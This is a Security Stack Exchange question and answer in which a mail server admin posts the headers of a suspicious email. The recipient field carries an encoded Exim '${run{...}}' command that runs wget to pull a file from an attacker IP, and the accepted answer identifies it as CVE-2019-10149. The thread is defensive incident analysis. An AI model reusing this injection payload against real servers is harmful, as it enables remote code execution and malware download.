68

Today I found an extremely unusual email in my catchall inbox, without subject, sender or content. My Gmail client for android reported the mail was sent by me, triggering a nuclear alert in my mind.

I had fear that someone had guessed my robust password and that this mail came from my mail transfer agent (MTA), so I rushed-look at both email itself and mail logs. That did not happen.

I found what looks to me like an attempt to exploit a mail server vulnerability that both fail2ban and I have never heard of.

Received: 20
Received: 19
Received: 22
Received: 21
Received: 18
Received: 15
Received: 14
Received: 17
Received: 16
Received: 29
Received: 28
Received: 31
Received: 30
Received: 27
Received: 24
Received: 23
Received: 26
Received: 25
Received: 13
Received: 3
Received: 4
Received: 5
Received: 2
Received: from example.org (localhost [127.0.0.1])
    by example.org (Postfix) with ESMTP id 1FA141219E6
    for <root+${run{x2Fbinx2Fsht-ctx22wgetx20YYY.YYY.YYY.YYYx2ftmpx2fYYY.YYY.YYY.YYYx22}}@example.org>; Wed, 19 Jun 2019 04:42:52 +0200 (CEST)
Received: from service.com (unknown [xx.xx.xx.xx])
    by example.org (Postfix) with SMTP
    for <root+${run{x2Fbinx2Fsht-ctx22wgetx20YYY.YYY.YYY.YYYx2ftmpx2fYYY.YYY.YYY.YYYx22}}@example.org>; Wed, 19 Jun 2019 04:42:50 +0200 (CEST)
Received: 1
Received: 10
Received: 11
Received: 12
Received: 9
Received: 6
Received: 7
Received: 8
Message-ID: <000701d52665$301b5e30$90521a90$@Domain>
MIME-Version: 1.0
Content-Type: text/plain;
    charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Outlook 16.0
X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx20xxx.xxx.xxx.xxxx2ftmpx2fxx.xxx.xxx.xxx22}}@example.org
Authentication-Results: example.org; 
X-DKIM-Authentication-Results: none
Thread-Index: AQHpZJXbpRRTStcSuHvAzmVQv5xuOw==

Analysis: the sender tried to alter the mail destination in order to launch the following (encoded) command and exploit a potential remote code execution vulnerability, where sequences of Xes denote an IP address

X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx20xxx.xxx.xxx.xxxx2ftmpx2fxx.xxx.xxx.xxxx22}}@example.org


x2Fbinx2Fsht-ctx22wgetx20[IP ADDR]x2ftmpx2f[IP ADDR]x22
/bin/sht-ct#wget [IP ADDR]/tmp/[IP ADDR]#

Despite sht-ct being something I'm not familiar with (or mistranslated from manual url-decoding), I start from the assumption that all attackers know I use Postfix as the MTA on my server.

Question:

I would like to confirm if this is a real attempt, as I suspect, to conduct a remote command execution attack with a crafted email. Secondarily, I urge to to assess if I have been pwned, in ways other than looking carefully at top and crontab. I need to understand if this attack affects my MTA or tries to exploit an outdated and well-fixed vulnerability.

I just rushed to update Postfix, but without knowledge of the vulnerability (and if it ever affects Postfix), I have little clue.

The reason I rush asking security questions about MTAs on public forums is that, in my opinion/experience, a hacked mail server boxes can start to cause lots of damage in extremely short time compared to other kinds of services, and that requires acting quickly.

usr-local-ΕΨΗΕΛΩΝ
  • 5,310
  • 2
  • 17
  • 35
  • Looks like they are trying to exploit an issue on the X-Original-To header parser, this could be related to a Postfix issue or to other MTA, check on the postfix mailing list or look directly to the source code. – camp0 Jun 19 '19 at 07:03
  • 1
    This appears to be SMTP Injection via recipient email addresses. https://www.mbsd.jp/Whitepaper/smtpi.pdf – cremefraiche Jun 19 '19 at 07:08
  • @cremefraiche excellent. Considering the article is dated 2015 and I keep my MTA up to date, I may assume this attack is not a 0-day and that I might be already protected against it. – usr-local-ΕΨΗΕΛΩΝ Jun 19 '19 at 07:13
  • @usr-local-ΕΨΗΕΛΩΝ I did a cursory search and found a CVE that references ruby mail gem <2.5.5. Unsure if this help you http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9097 https://nvd.nist.gov/vuln/detail/CVE-2015-9097. Can't speak to the possibility of a zero-day but I would search around for command injection related to your mail stack and see if anything newer comes up. – cremefraiche Jun 19 '19 at 07:19
  • I have accepted @SteffeinUllrich answer (and going to add few lines of details) because it perfectly matches the attack pattern. This Q&A could potentially help others in the following days/weeks to urge to update EXIM if they use it. – usr-local-ΕΨΗΕΛΩΝ Jun 19 '19 at 07:42
  • 2
    I'm seeing this same attack pattern on one of the Postfix servers I manage which began yesterday around 3:13pm CT. The "Received" notations in the email led me to think there might have been a successful download but not seeing any obvious signs in `/tmp`. – Nathan Jun 19 '19 at 16:03
  • 4
    "*I would like to know if this [bit of code I am posting on a publicly accessible SEO-optimized website as part of a high-visibility Hot Network Question] is a recent known or 0-day vulnerability.*" If the answer was *yes,* do you think posting it here would really be the best course of action, for everybody else's security? (Meta discussion [here](https://security.meta.stackexchange.com/q/3215/79319).) – WBT Jun 19 '19 at 20:45
  • 4
    @WBT, yes, it made me feel much better to see someone else with some information, anyone scanning this site to exploit such information must be outwitted by the true purpose of the followers of this site or else security.stackexchange itself is to be called into question. This site serves as the source of the cure of immediate issues, or it isn't as "hot network" frontline benefactor as might be hoped. – Motomotes Jun 20 '19 at 04:22
  • @Motes Are you assuming that everyone who might possibly be vulnerable to the attack reads this SE and this question specifically, especially as quickly as it's posted? I don't think that's a fair assumption. – WBT Jun 20 '19 at 13:17
  • 6
    @camp0, if I could downvote comments, I'd downvote yours. Why is it the first response of so many people to "look at the source code". That I know what I'm doing enough to run an MTA does not mean I can decipher and interpret source code of a package I'm using, any more than being able to drive makes me a qualified mechanic. – Darren Jun 20 '19 at 13:58
  • @WBJ, I can't seriously read your reply it is so presumptive. Anyone is not everyone, somewhere is not everywhere, just because something is not everything and it is not everywhere does not mean it is not anywhere. – Motomotes Jun 20 '19 at 14:48
  • @Nathan I had the same suspect but I had to admit that an executable malware downloaded and executed from tmp would obviously delete itself and conceal its presence under different directories. In your shoes, I would take a **deep** look at `top`, `crontab` and `init.d`. Answer only *suggests* Postfix is not vulnerable but who knows for sure – usr-local-ΕΨΗΕΛΩΝ Jun 21 '19 at 12:35
  • @Darren Learning the language most of your userspace is written in is a very useful skill. It's not that difficult to learn, especially because reading code is easier than writing it. While ostensibly a sysadmin might never need to know C, the reality is that many problems can be traced down to a bug in the code, and waiting potentially weeks, months, or years for it to be discovered independently isn't always a great solution when your web server suddenly stops accepting connections and maxes out all CPU cores. – forest Jun 26 '19 at 06:26

1 Answers1

92

This is an attempt to exploit the current remote code execution issue in the EXIM mail server, i.e. CVE-2019-10149. See The Return of the WIZard: RCE in Exim for details and also the kind of exploit you encountered. You are safe if you are not using EXIM or run a fixed version.

From the linked article (emphasis added):

This vulnerability is exploitable instantly by a local attacker (and by a remote attacker in certain non-default configurations). To remotely exploit this vulnerability in the default configuration, an attacker must keep a connection to the vulnerable server open for 7 days (by transmitting one byte every few minutes). However, because of the extreme complexity of Exim's code, we cannot guarantee that this exploitation method is unique; faster methods may exist.

[...]

Because expand_string() recognizes the "${run{ }}" expansion item, and because new->address is the recipient of the mail that is being delivered, a local attacker can simply send a mail to "${run{...}}@localhost" (where "localhost" is one of Exim's local_domains) and execute arbitrary commands, as root (deliver_drop_privilege is false, by default):

root@debian:~# cat /tmp/id
uid=0(root) gid=111(Debian-exim) groups=111(Debian-exim)
uid=0(root) gid=111(Debian-exim) groups=111(Debian-exim)
Dubu
  • 311
  • 2
  • 8
Steffen Ullrich
  • 184,332
  • 29
  • 363
  • 424